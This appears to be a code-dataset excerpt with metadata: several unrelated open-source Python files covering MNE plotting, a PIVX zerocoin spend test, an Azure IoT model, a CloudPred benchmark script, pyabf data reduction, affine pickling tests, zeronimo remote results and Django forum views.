if mode == 'csd':
titles = ['Cross-spectral density']
# Units and scaling unknown
units = dict()
scalings = dict()
elif mode == 'coh':
titles = ['Coherence']
n_freqs = len(csd.frequencies)
if n_cols is None:
n_cols = int(np.ceil(np.sqrt(n_freqs)))
n_rows = int(np.ceil(n_freqs / float(n_cols)))
figs = []
for ind, title, ch_type in zip(indices, titles, ['eeg', 'mag', 'grad']):
if len(ind) == 0:
continue
fig, axes = plt.subplots(n_rows, n_cols, squeeze=False,
figsize=(2 * n_cols + 1, 2.2 * n_rows))
csd_mats = []
for i in range(len(csd.frequencies)):
cm = csd.get_data(index=i)[ind][:, ind]
if mode == 'csd':
cm = np.abs(cm) * scalings.get(ch_type, 1)
elif mode == 'coh':
# Compute coherence from the CSD matrix
psd = np.diag(cm).real
cm = np.abs(cm) ** 2 / psd[np.newaxis, :] / psd[:, np.newaxis]
csd_mats.append(cm)
vmax = np.max(csd_mats)
for i, (freq, mat) in enumerate(zip(csd.frequencies, csd_mats)):
ax = axes[i // n_cols][i % n_cols]
im = ax.imshow(mat, interpolation='nearest', cmap=cmap, vmin=0,
vmax=vmax)
ax.set_xticks([])
ax.set_yticks([])
if csd._is_sum:
ax.set_title('%.1f-%.1f Hz.' % (np.min(freq),
np.max(freq)))
else:
ax.set_title('%.1f Hz.' % freq)
plt.suptitle(title)
plt.subplots_adjust(top=0.8)
if colorbar:
cb = plt.colorbar(im, ax=[a for ax_ in axes for a in ax_])
if mode == 'csd':
label = u'CSD'
if ch_type in units:
label += u' (%s)' % units[ch_type]
cb.set_label(label)
elif mode == 'coh':
cb.set_label('Coherence')
figs.append(fig)
plt_show(show)
return figs
| mne/viz/misc.py | 48,875 | Check for valid fscale.
Create approximately spaced ticks between lims.
Get reasonable frequency limits.
Get our press callback.
Create event-integer-to-color mapping, assigning defaults as needed.
Plot BEM contours on anatomical slices.
Adjust some properties of axes.
Parameters
----------
axes : list
List of axes to process.
remove_spines : list of str
Which axis spines to remove.
grid : bool
Turn grid on (True) or off (False).
Plot BEM contours on anatomical slices.
Parameters
----------
subject : str
Subject name.
subjects_dir : str | None
Path to the SUBJECTS_DIR. If None, the path is obtained by using
the environment variable SUBJECTS_DIR.
orientation : str
'coronal' or 'axial' or 'sagittal'.
slices : list of int
Slice indices.
brain_surfaces : None | str | list of str
One or more brain surface to plot (optional). Entries should correspond
to files in the subject's ``surf`` directory (e.g. ``"white"``).
src : None | SourceSpaces | str
SourceSpaces instance or path to a source space to plot individual
sources as scatter-plot. Sources will be shown on exactly one slice
(whichever slice is closest to each source in the given orientation
plane). Path can be absolute or relative to the subject's ``bem``
folder.
.. versionchanged:: 0.20
All sources are shown on the nearest slice rather than some
being omitted.
show : bool
Show figure if True.
show_indices : bool
Show slice indices if True.
.. versionadded:: 0.20
mri : str
The name of the MRI to use. Can be a standard FreeSurfer MRI such as
``'T1.mgz'``, or a full path to a custom MRI file.
.. versionadded:: 0.21
show_orientation : str
Show the orientation (L/R, P/A, I/S) of the data slices.
.. versionadded:: 0.21
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
mne.viz.plot_alignment
Notes
-----
Images are plotted in MRI voxel coordinates.
If ``src`` is not None, for a given slice index, all source points are
shown that are halfway between the previous slice and the given slice,
and halfway between the given slice and the next slice.
For large slice decimations, this can
make some source points appear outside the BEM contour, which is shown
for the given slice index. For example, in the case where the single
midpoint slice is used ``slices=[128]``, all source points will be shown
on top of the midpoint MRI slice with the BEM boundary drawn for that
slice.
Plot Covariance data.
Parameters
----------
cov : instance of Covariance
The covariance matrix.
info : dict
Measurement info.
exclude : list of str | str
List of channels to exclude. If empty do not exclude any channel.
If 'bads', exclude info['bads'].
colorbar : bool
Show colorbar or not.
proj : bool
Apply projections or not.
show_svd : bool
Plot also singular values of the noise covariance for each sensor
type. We show square roots ie. standard deviations.
show : bool
Show figure if True.
%(verbose)s
Returns
-------
fig_cov : instance of matplotlib.figure.Figure
The covariance plot.
fig_svd : instance of matplotlib.figure.Figure | None
The SVD spectra plot of the covariance.
See Also
--------
mne.compute_rank
Notes
-----
For each channel type, the rank is estimated using
:func:`mne.compute_rank`.
.. versionchanged:: 0.19
Approximate ranks for each channel type are shown with red dashed lines.
Plot CSD matrices.
A sub-plot is created for each frequency. If an info object is passed to
the function, different channel types are plotted in different figures.
Parameters
----------
csd : instance of CrossSpectralDensity
The CSD matrix to plot.
info : instance of Info | None
To split the figure by channel-type, provide the measurement info.
By default, the CSD matrix is plotted as a whole.
mode : 'csd' | 'coh'
Whether to plot the cross-spectral density ('csd', the default), or
the coherence ('coh') between the channels.
colorbar : bool
Whether to show a colorbar. Defaults to ``True``.
cmap : str | None
The matplotlib colormap to use. Defaults to None, which means the
colormap will default to matplotlib's default.
n_cols : int | None
CSD matrices are plotted in a grid. This parameter controls how
many matrix to plot side by side before starting a new row. By
default, a number will be chosen to make the grid as square as
possible.
show : bool
Whether to show the figure. Defaults to ``True``.
Returns
-------
fig : list of Figure
The figures created by this function.
Plot the amplitude traces of a set of dipoles.
Parameters
----------
dipoles : list of instance of Dipole
The dipoles whose amplitudes should be shown.
colors : list of color | None
Color to plot with each dipole. If None default colors are used.
show : bool
Show figure if True.
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
Plot events to get a visual display of the paradigm.
Parameters
----------
events : array, shape (n_events, 3)
The events.
sfreq : float | None
The sample frequency. If None, data will be displayed in samples (not
seconds).
first_samp : int
The index of the first sample. Recordings made on Neuromag systems
number samples relative to the system start (not relative to the
beginning of the recording). In such cases the ``raw.first_samp``
attribute can be passed here. Default is 0.
color : dict | None
Dictionary of event_id integers as keys and colors as values. If None,
colors are automatically drawn from a default list (cycled through if
number of events longer than list of default colors). Color can be any
valid :doc:`matplotlib color <tutorials/colors/colors>`.
event_id : dict | None
Dictionary of event labels (e.g. 'aud_l') as keys and their associated
event_id values. Labels are used to plot a legend. If None, no legend
is drawn.
axes : instance of Axes
The subplot handle.
equal_spacing : bool
Use equal spacing between events in y-axis.
show : bool
Show figure if True.
%(on_missing_events)s
%(verbose)s
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
Plot properties of a filter.
Parameters
----------
h : dict or ndarray
An IIR dict or 1D ndarray of coefficients (for FIR filter).
sfreq : float
Sample rate of the data (Hz).
freq : array-like or None
The ideal response frequencies to plot (must be in ascending order).
If None (default), do not plot the ideal response.
gain : array-like or None
The ideal response gains to plot.
If None (default), do not plot the ideal response.
title : str | None
The title to use. If None (default), determine the title based
on the type of the system.
color : color object
The color to use (default '#1f77b4').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None, freq will be used. If None (default) and freq is None,
``(0.1, sfreq / 2.)`` will be used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
The y-axis amplitude limits (dB) to use (default: (-60, 10)).
show : bool
Show figure if True (default).
compensate : bool
If True, compensate for the filter delay (phase will not be shown).
- For linear-phase FIR filters, this visualizes the filter coefficients
assuming that the output will be shifted by ``N // 2``.
- For IIR filters, this changes the filter coefficient display
by filtering backward and forward, and the frequency response
by squaring it.
.. versionadded:: 0.18
plot : list | tuple | str
A list of the requested plots from ``time``, ``magnitude`` and
``delay``. Default is to plot all three filter properties
('time', 'magnitude', 'delay').
.. versionadded:: 0.21.0
axes : instance of Axes | list | None
The axes to plot to. If list, the list must be a list of Axes of
the same length as the number of requested plot types. If instance of
Axes, there must be only one filter property plotted.
Defaults to ``None``.
.. versionadded:: 0.21.0
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the plots.
See Also
--------
mne.filter.create_filter
plot_ideal_filter
Notes
-----
.. versionadded:: 0.14
Plot an ideal filter response.
Parameters
----------
freq : array-like
The ideal response frequencies to plot (must be in ascending order).
gain : array-like or None
The ideal response gains to plot.
axes : instance of Axes | None
The subplot handle. With None (default), axes are created.
title : str
The title to use, (default: '').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None (default), freq used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
If not None (default), the y-axis limits (dB) to use.
color : color object
The color to use (default: 'r').
alpha : float
The alpha to use (default: 0.5).
linestyle : str
The line style to use (default: '--').
show : bool
Show figure if True (default).
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
plot_filter
Notes
-----
.. versionadded:: 0.14
Examples
--------
Plot a simple ideal band-pass filter::
>>> from mne.viz import plot_ideal_filter
>>> freq = [0, 1, 40, 50]
>>> gain = [0, 1, 1, 0]
>>> plot_ideal_filter(freq, gain, flim=(0.1, 100)) #doctest: +ELLIPSIS
<...Figure...>
Plot source power in time-freqency grid.
Parameters
----------
stcs : list of SourceEstimate
Source power for consecutive time windows, one SourceEstimate object
should be provided for each frequency bin.
freq_bins : list of tuples of float
Start and end points of frequency bins of interest.
tmin : float
Minimum time instant to show.
tmax : float
Maximum time instant to show.
source_index : int | None
Index of source for which the spectrogram will be plotted. If None,
the source with the largest activation will be selected.
colorbar : bool
If true, a colorbar will be added to the plot.
show : bool
Show figure if True.
Returns
-------
fig : instance of Figure
The figure.
Functions to make simple plots with M/EEG data.
-*- coding: utf-8 -*- Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr> Denis Engemann <denis.engemann@gmail.com> Martin Luessi <mluessi@nmr.mgh.harvard.edu> Eric Larson <larson.eric.d@gmail.com> Cathy Nangini <cnangini@gmail.com> Mainak Jas <mainak@neuro.hut.fi> License: Simplified BSD Activate the projection items Protect against true zero singular values Input checks Preparing time-frequency cell boundaries for plotting Reject time points that will not be plotted and gather results copy since crop modifies inplace Finding the source with maximum source power If there is a gap in the frequency bins record its locations so that it can be covered with a gray horizontal bar Preparing time-frequency grid for plotting Plotting the results Covering frequency gaps with horizontal bars For ease of plotting, we will do everything in voxel coordinates. Load the T1 data plot axes (x, y, z) as data axes allow negative indexing Proceed in the opposite order to maintain left-to-right / orientation create of list of surfaces move surface to voxel coordinate system Eventually we can relax this by allowing ``trans`` if need be float adjust the orientations for good view First plot the anatomical data XXX eventually could deal with zooms and then plot the contours on top ignore contour warn label the axes left right bottom top Get the BEM surface filenames Plot the contours get labels and unique event ids from event_id dict, sorted by value reverse order so that the highest numbers are at the top (match plot order) let matplotlib handle it IIR h.ndim == 2: second-order sections time reversal is freq conj Assume the forward-backward delay zeros out, which it mostly should singular GD singular GD singular GD Magnitude Delay shade nulled regions deal with semilogx problems @ x=0 warn if not enough colors key was a valid event integer key was an event label key not a valid event, warn and ignore warn if color_dict is missing any entries The units in which to plot the CSD Units and scaling unknown Compute coherence from the CSD matrix | 12,603 | en | 0.682281 |
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The PIVX developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Tests v2, v3 and v4 Zerocoin Spends
'''
from time import sleep
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import PnyTestFramework
from test_framework.util import (
sync_blocks,
assert_equal,
assert_raises_rpc_error,
set_node_times,
DecimalAmt
)
class ZerocoinSpendTest(PnyTestFramework):
def set_test_params(self):
self.num_nodes = 3
# node 0 and node 1 move the chain (node 0 also sets the sporks)
# node 2 does the spends
self.extra_args = [[]]*self.num_nodes
self.extra_args[0].append('-sporkkey=932HEevBSujW2ud7RfB1YF91AFygbBRQj3de3LyaCRqNzKKgWXi')
def setup_chain(self):
# Start with PoS cache: 330 blocks
self._initialize_chain(toPosPhase=True)
self.enable_mocktime()
def log_title(self):
title = "*** Starting %s ***" % self.__class__.__name__
underline = "-" * len(title)
description = "Tests v2, v3 and v4 Zerocoin Spends."
self.log.info("\n\n%s\n%s\n%s\n", title, underline, description)
def setV4SpendEnforcement(self, fEnable=True):
sporkName = "SPORK_18_ZEROCOIN_PUBLICSPEND_V4"
# update spork 18 with node[0]
if fEnable:
self.log.info("Enabling v4 PublicSpend version with SPORK 18...")
res = self.activate_spork(0, sporkName)
else:
self.log.info("Enabling v3 PublicSpend version with SPORK 18...")
res = self.deactivate_spork(0, sporkName)
assert_equal(res, "success")
sleep(1)
# check that node[1] receives it
assert_equal(fEnable, self.is_spork_active(1, sporkName))
self.log.info("done")
def run_test(self):
def get_zerocoin_data(coin):
return coin["s"], coin["r"], coin["k"], coin["id"], coin["d"], coin["t"]
def check_balances(denom, zpny_bal, pny_bal):
zpny_bal -= denom
assert_equal(self.nodes[2].getzerocoinbalance()['Total'], zpny_bal)
pny_bal += denom
wi = self.nodes[2].getwalletinfo()
assert_equal(wi['balance'] + wi['immature_balance'], pny_bal)
return zpny_bal, pny_bal
def stake_4_blocks(block_time):
for peer in range(2):
for i in range(2):
block_time = self.generate_pos(peer, block_time)
sync_blocks(self.nodes)
return block_time
self.log_title()
block_time = self.mocktime
set_node_times(self.nodes, block_time)
# Start with cache balances
wi = self.nodes[2].getwalletinfo()
balance = wi['balance'] + wi['immature_balance']
zpny_balance = self.nodes[2].getzerocoinbalance()['Total']
assert_equal(balance, DecimalAmt(13833.92))
assert_equal(zpny_balance, 6666)
# Export zerocoin data
listmints = self.nodes[2].listmintedzerocoins(True, True)
serial_ids = [mint["serial hash"] for mint in listmints]
exported_zerocoins = [x for x in self.nodes[2].exportzerocoins(False) if x["id"] in serial_ids]
exported_zerocoins.sort(key=lambda x: x["d"], reverse=False)
assert_equal(8, len(exported_zerocoins))
# 1) stake more blocks - save a v3 spend for later (serial_1)
serial_1, randomness_1, privkey_1, id_1, denom_1, tx_1 = get_zerocoin_data(exported_zerocoins[1])
self.log.info("Staking 70 blocks to get to public spend activation")
for j in range(5):
for peer in range(2):
for i in range(7):
block_time = self.generate_pos(peer, block_time)
sync_blocks(self.nodes)
old_spend_v3 = self.nodes[2].createrawzerocoinspend(id_1)
# 2) Spend one minted coin - spend v3 (serial_2)
serial_2, randomness_2, privkey_2, id_2, denom_2, tx_2 = get_zerocoin_data(exported_zerocoins[2])
self.log.info("Spending the minted coin with serial %s..." % serial_2[:16])
txid = self.nodes[2].spendzerocoinmints([id_2])['txid']
# stake 4 blocks - check it gets included on chain and check balances
block_time = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
zpny_balance, balance = check_balances(denom_2, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v3) PASSED")
# 3) Check double spends - spend v3
self.log.info("Trying to spend the serial twice now...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_2, randomness_2, denom_2, privkey_2, "", tx_2)
# 4) Activate v4 spends with SPORK_18
self.setV4SpendEnforcement()
# 5) Spend one minted coin - spend v4 (serial_3)
serial_3, randomness_3, privkey_3, id_3, denom_3, tx_3 = get_zerocoin_data(exported_zerocoins[3])
self.log.info("Spending the minted coin with serial %s..." % serial_3[:16])
txid = self.nodes[2].spendzerocoinmints([id_3])['txid']
# stake 4 blocks - check it gets included on chain and check balances
block_time = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
zpny_balance, balance = check_balances(denom_3, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v4) PASSED")
# 6) Check double spends - spend v4
self.log.info("Trying to spend the serial twice now...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_3, randomness_3, denom_3, privkey_3, "", tx_3)
# 7) Try to relay old v3 spend now (serial_1)
self.log.info("Trying to send old v3 spend now...")
assert_raises_rpc_error(-26, "bad-txns-invalid-zpny",
self.nodes[2].sendrawtransaction, old_spend_v3)
self.log.info("GOOD: Old transaction not sent.")
# 8) Try to double spend with v4 a mint already spent with v3 (serial_2)
self.log.info("Trying to double spend v4 against v3...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_2, randomness_2, denom_2, privkey_2, "", tx_2)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 9) Reactivate v3 spends and try to spend the old saved one (serial_1) again
self.setV4SpendEnforcement(False)
self.log.info("Trying to send old v3 spend now (serial: %s...)" % serial_1[:16])
txid = self.nodes[2].sendrawtransaction(old_spend_v3)
# stake 4 blocks - check it gets included on chain and check balances
_ = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
# need to reset spent mints since this was a raw broadcast
self.nodes[2].resetmintzerocoin()
_, _ = check_balances(denom_1, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v3) PASSED")
if __name__ == '__main__':
ZerocoinSpendTest().main()
| test/functional/wallet_zerocoin_publicspends.py | 7,398 | Tests v2, v3 and v4 Zerocoin Spends
!/usr/bin/env python3 Copyright (c) 2019-2020 The PIVX developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. node 0 and node 1 move the chain (node 0 also sets the sporks) node 2 does the spends Start with PoS cache: 330 blocks update spork 18 with node[0] check that node[1] receives it Start with cache balances Export zerocoin data 1) stake more blocks - save a v3 spend for later (serial_1) 2) Spend one minted coin - spend v3 (serial_2) stake 4 blocks - check it gets included on chain and check balances 3) Check double spends - spend v3 4) Activate v4 spends with SPORK_18 5) Spend one minted coin - spend v4 (serial_3) stake 4 blocks - check it gets included on chain and check balances 6) Check double spends - spend v4 7) Try to relay old v3 spend now (serial_1) 8) Try to double spend with v4 a mint already spent with v3 (serial_2) 9) Reactivate v3 spends and try to spend the old saved one (serial_1) again stake 4 blocks - check it gets included on chain and check balances need to reset spent mints since this was a raw broadcast | 1,171 | en | 0.84856 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ConfigurationQueriesTestResponse(Model):
"""ConfigurationQueriesTestResponse.
:param target_condition_error:
:type target_condition_error: str
:param custom_metric_query_errors:
:type custom_metric_query_errors: dict[str, str]
"""
_attribute_map = {
'target_condition_error': {'key': 'targetConditionError', 'type': 'str'},
'custom_metric_query_errors': {'key': 'customMetricQueryErrors', 'type': '{str}'},
}
def __init__(self, **kwargs):
super(ConfigurationQueriesTestResponse, self).__init__(**kwargs)
self.target_condition_error = kwargs.get('target_condition_error', None)
self.custom_metric_query_errors = kwargs.get('custom_metric_query_errors', None)
| azext_iot/sdk/iothub/service/models/configuration_queries_test_response.py | 1,258 | ConfigurationQueriesTestResponse.
:param target_condition_error:
:type target_condition_error: str
:param custom_metric_query_errors:
:type custom_metric_query_errors: dict[str, str]
coding=utf-8 -------------------------------------------------------------------------- Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT License. See License.txt in the project root for license information. Code generated by Microsoft (R) AutoRest Code Generator. Changes may cause incorrect behavior and will be lost if the code is regenerated. -------------------------------------------------------------------------- | 638 | en | 0.472855 |
########################################################
# run_tp.py
# Author: Jamie Zhu <jimzhu@GitHub>
# Created: 2014/2/6
# Last updated: 2014/5/8
# Implemented approach: CloudPred
# Evaluation metrics: MAE, NMAE, RMSE, MRE, NPRE
########################################################
import numpy as np
import os, sys, time
import multiprocessing
sys.path.append('src')
# Build external model
if not os.path.isfile('src/core.so'):
print 'Lack of core.so (built from the C++ module).'
print 'Please first build the C++ code into core.so by using: '
print '>> python setup.py build_ext --inplace'
sys.exit()
from utilities import *
import evaluator
import dataloader
#########################################################
# config area
#
para = {'dataType': 'tp', # set the dataType as 'rt' or 'tp'
'dataPath': '../data/dataset#1/',
'outPath': 'result/',
'metrics': ['MAE', 'NMAE', 'RMSE', 'MRE', 'NPRE'], # delete where appropriate
'density': list(np.arange(0.05, 0.31, 0.05)), # matrix density
'rounds': 20, # how many runs are performed at each matrix density
'dimension': 20, # dimenisionality of the latent factors
'lambda': 800, # regularization parameter
'topK': 10, # the parameter of TopK similar users or services, the default value is
# topK = 10 as in the reference paper
'weight': 0.5, # the combination weight of UPCC and IPCC, the default value is
# weight = 0.5 as in the reference paper
'maxIter': 300, # the max iterations
'saveTimeInfo': False, # whether to keep track of the running time
'saveLog': False, # whether to save log into file
'debugMode': False, # whether to record the debug info
'parallelMode': True # whether to leverage multiprocessing for speedup
}
initConfig(para)
#########################################################
startTime = time.clock() # start timing
logger.info('==============================================')
logger.info('CloudPred: [Zhang et al, SRDS\'2011].')
# load the dataset
dataMatrix = dataloader.load(para)
logger.info('Loading data done.')
# run for each density
if para['parallelMode']: # run on multiple processes
pool = multiprocessing.Pool()
for density in para['density']:
pool.apply_async(evaluator.execute, (dataMatrix, density, para))
pool.close()
pool.join()
else: # run on single processes
for density in para['density']:
evaluator.execute(dataMatrix, density, para)
logger.info(time.strftime('All done. Total running time: %d-th day - %Hhour - %Mmin - %Ssec.',
time.gmtime(time.clock() - startTime)))
logger.info('==============================================')
sys.path.remove('src')
| benchmarks/hybrid/CloudPred/run_tp.py | 2,667 | run_tp.py Author: Jamie Zhu <jimzhu@GitHub> Created: 2014/2/6 Last updated: 2014/5/8 Implemented approach: CloudPred Evaluation metrics: MAE, NMAE, RMSE, MRE, NPRE Build external model config area set the dataType as 'rt' or 'tp' delete where appropriate matrix density how many runs are performed at each matrix density dimenisionality of the latent factors regularization parameter the parameter of TopK similar users or services, the default value is topK = 10 as in the reference paper the combination weight of UPCC and IPCC, the default value is weight = 0.5 as in the reference paper the max iterations whether to keep track of the running time whether to save log into file whether to record the debug info whether to leverage multiprocessing for speedup start timing load the dataset run for each density run on multiple processes run on single processes | 867 | en | 0.781422 |
"""This code demonstrates how to perform the tested data reduction module.
"""
import os
import sys
import glob
import pyabf
import matplotlib.pyplot as plt
pathToHere = os.path.abspath(os.path.dirname(__file__))
pathToData = os.path.abspath(pathToHere + "/../data/")
pathToModule = os.path.abspath(pathToHere + "/../../src/")
sys.path.insert(0, pathToModule)
import drtest as dr
for file in sorted(glob.glob(pathToData + "/*.abf")):
abf = pyabf.ABF(file)
abf.setSweep(4, 1)
xdata = abf.sweepX
ydata = abf.sweepY
da = dr.DataAnalysis(xdata, ydata)
xdec, ydec = da.data_reduction(method='decimate', reduction_factor=4)
xavr, yavr = da.data_reduction(method='average', reduction_factor=4)
xmin, ymin = da.data_reduction(method='min', reduction_factor=4)
xmax, ymax = da.data_reduction(method='max', reduction_factor=4)
xminmax, yminmax = da.data_reduction(method='min/max', reduction_factor=4)
xxxx = [xdec, xavr, xmin, xmax, xminmax]
yyyy = [ydec, yavr, ymin, ymax, yminmax]
## 2D plot
# plt.plot(xdec, ydec)
# plt.plot(xavr, yavr)
# plt.plot(xmin, ymin)
# plt.plot(xmax, ymax)
# plt.show()
## 3D plot
fig = plt.figure()
ax = fig.gca(projection='3d')
zs = [i for i in range(0, 6)]
ax.plot(xdata, ydata, zs[0], zdir='y', color='black', linewidth=1.5)
ax.plot(xdec, ydec, zs[1], zdir='y', color='red', linewidth=1.5)
ax.plot(xavr, yavr, zs[2], zdir='y', color='green', linewidth=1.5)
ax.plot(xmin, ymin, zs[3], zdir='y', color='orange', linewidth=1.5)
ax.plot(xmax, ymax, zs[4], zdir='y', color='blue', linewidth=1.5)
ax.plot(xminmax, yminmax, zs[5], zdir='y', color='brown', linewidth=1.5)
zlabels = [' ', 'raw data', 'decimate', 'average', 'minimum', 'maximum', 'min/max']
ax.set_xlabel('Time (s)', fontweight='bold', fontsize='medium')
ax.set_zlabel('Voltage (mV)', fontweight='bold', fontsize='medium')
ax.set_yticklabels(zlabels, rotation=-15, verticalalignment='baseline', horizontalalignment='left', fontweight='bold')
for angle in range(0, 360):
ax.view_init(25, angle)
plt.draw()
plt.pause(.0001) | examples/scripts/data_reduction_ex1.py | 2,320 | This code demonstrates how to perform the tested data reduction module.
2D plot plt.plot(xdec, ydec) plt.plot(xavr, yavr) plt.plot(xmin, ymin) plt.plot(xmax, ymax) plt.show() 3D plot | 184 | en | 0.262137 |
"""
Validate that instances of `affine.Affine()` can be pickled and unpickled.
"""
import pickle
from multiprocessing import Pool
import affine
def test_pickle():
a = affine.Affine(1, 2, 3, 4, 5, 6)
assert pickle.loads(pickle.dumps(a)) == a
def _mp_proc(x):
# A helper function - needed for test_with_multiprocessing()
# Can't be defined inside the test because multiprocessing needs
# everything to be in __main__
assert isinstance(x, affine.Affine)
return x
def test_with_multiprocessing():
a1 = affine.Affine(1, 2, 3, 4, 5, 6)
a2 = affine.Affine(6, 5, 4, 3, 2, 1)
results = Pool(2).map(_mp_proc, [a1, a2])
for expected, actual in zip([a1, a2], results):
assert expected == actual
| Lxml_requests/source/affine/tests/test_pickle.py | 744 | Validate that instances of `affine.Affine()` can be pickled and unpickled.
A helper function - needed for test_with_multiprocessing() Can't be defined inside the test because multiprocessing needs everything to be in __main__ | 227 | en | 0.833897 |
# -*- coding: utf-8 -*-
"""
zeronimo.results
~~~~~~~~~~~~~~~~
:copyright: (c) 2013-2017 by Heungsub Lee
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from binascii import hexlify
from gevent.event import AsyncResult
from gevent.queue import Queue
from zeronimo.exceptions import TaskClosed
from zeronimo.helpers import make_repr
from zeronimo.messaging import BREAK, DONE, RAISE, RETURN, YIELD
__all__ = ['RemoteResult', 'RemoteException', 'RemoteIterator']
class RemoteResult(AsyncResult):
"""The task object.
:param customer: the customer object.
:param id: the task identifier.
:param invoker_id: the identifier of the invoker which spawned this task.
:param worker_info: the value the worker sent at accepting.
"""
def __init__(self, collector, call_id, task_id, worker_info=None):
super(RemoteResult, self).__init__()
self.collector = collector
self.call_id = call_id
self.task_id = task_id
self.worker_info = worker_info
def close(self):
"""Stops to collect replies from its task."""
self.set_exception(TaskClosed)
self.collector.remove_result(self)
# iterator
_iterator = False
def is_iterator(self):
return self._iterator
def set_iterator(self):
self._iterator = True
self.set(RemoteIterator())
# exception
def set_remote_exception(self, remote_exc_info):
"""Raises an exception as a :exc:`RemoteException`."""
exc_type, exc_str, filename, lineno = remote_exc_info[:4]
exc_type = RemoteException.compose(exc_type)
exc = exc_type(exc_str, filename, lineno, self.worker_info)
if len(remote_exc_info) > 4:
state = remote_exc_info[4]
exc.__setstate__(state)
self.set_exception(exc)
def set_exception(self, exc):
if self.is_iterator():
self.get().throw(exc)
else:
super(RemoteResult, self).set_exception(exc)
# reply receivers
def set_reply(self, method, value):
if method == RETURN:
self._return(value)
elif method == YIELD:
self._yield(value)
elif method == RAISE:
self._raise(value)
elif method == BREAK:
self._break(value)
if method & DONE:
self.collector.remove_result(self)
def _return(self, value):
self.set(value)
def _yield(self, value):
if not self.is_iterator():
self.set_iterator()
self.get().send(value)
def _raise(self, value):
self.set_remote_exception(value)
def _break(self, value):
if self.is_iterator():
self.get().close()
else:
self.set(iter([]))
def __repr__(self):
return make_repr(self, None, ['call_id', 'task_id', 'worker_info'],
reprs={'call_id': hexlify, 'task_id': hexlify})
class RemoteException(BaseException):
_composed = {}
@classmethod
def compose(cls, exc_type):
try:
return cls._composed[exc_type]
except KeyError:
class composed_exc_type(exc_type, cls):
__init__ = cls.__init__
composed_exc_type.exc_type = exc_type
composed_exc_type.exctype = exc_type # For backward compatibility.
composed_exc_type.__name__ = exc_type.__name__ + '(Remote)'
# Avoid to start with dot in traceback.
composed_exc_type.__module__ = 'exceptions'
cls._composed[exc_type] = composed_exc_type
return composed_exc_type
def __init__(self, message, filename=None, lineno=None, worker_info=None):
super(RemoteException, self).__init__(message)
self.filename = filename
self.lineno = lineno
self.worker_info = worker_info
def __str__(self):
string = super(RemoteException, self).__str__()
if self.filename is not None:
string += ' ({0}:{1})'.format(self.filename, self.lineno)
return string
class RemoteIterator(object):
def __init__(self):
self.queue = Queue()
def __iter__(self):
return self
def send(self, value):
if self.queue is None:
raise StopIteration
self.queue.put((True, value))
def throw(self, exc):
if self.queue is None:
raise StopIteration
self.queue.put((False, exc))
def close(self):
self.throw(StopIteration)
def __next__(self):
if self.queue is None:
raise StopIteration
yields, value = self.queue.get()
if yields:
return value
else:
self.queue = None
raise value
next = __next__ # for Python 2
| zeronimo/results.py | 4,844 | The task object.
:param customer: the customer object.
:param id: the task identifier.
:param invoker_id: the identifier of the invoker which spawned this task.
:param worker_info: the value the worker sent at accepting.
Stops to collect replies from its task.
Raises an exception as a :exc:`RemoteException`.
zeronimo.results
~~~~~~~~~~~~~~~~
:copyright: (c) 2013-2017 by Heungsub Lee
:license: BSD, see LICENSE for more details.
-*- coding: utf-8 -*- iterator exception reply receivers For backward compatibility. Avoid to start with dot in traceback. for Python 2 | 570 | en | 0.787522 |
from forums.models import Forum, Comment
from django.views import View
from django.views import generic
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse
from django.contrib.auth.mixins import LoginRequiredMixin
from forums.forms import CommentForm
from myarts.owner import OwnerListView, OwnerDetailView, OwnerCreateView, OwnerUpdateView, OwnerDeleteView
class ForumListView(OwnerListView):
model = Forum
template_name = "forums/list.html"
class ForumDetailView(OwnerDetailView):
model = Forum
template_name = "forums/detail.html"
def get(self, request, pk) :
x = get_object_or_404(Forum, id=pk)
comments = Comment.objects.filter(forum=x).order_by('-updated_at')
comment_form = CommentForm()
context = { 'forum' : x, 'comments': comments, 'comment_form': comment_form }
return render(request, self.template_name, context)
class ForumCreateView(OwnerCreateView):
model = Forum
fields = ['title', 'text']
template_name = "forums/form.html"
class ForumUpdateView(OwnerUpdateView):
model = Forum
fields = ['title', 'text']
template_name = "forums/form.html"
class ForumDeleteView(OwnerDeleteView):
model = Forum
template_name = "forums/delete.html"
class CommentCreateView(LoginRequiredMixin, View):
def post(self, request, pk) :
f = get_object_or_404(Forum, id=pk)
comment = Comment(text=request.POST['comment'], owner=request.user, forum=f)
comment.save()
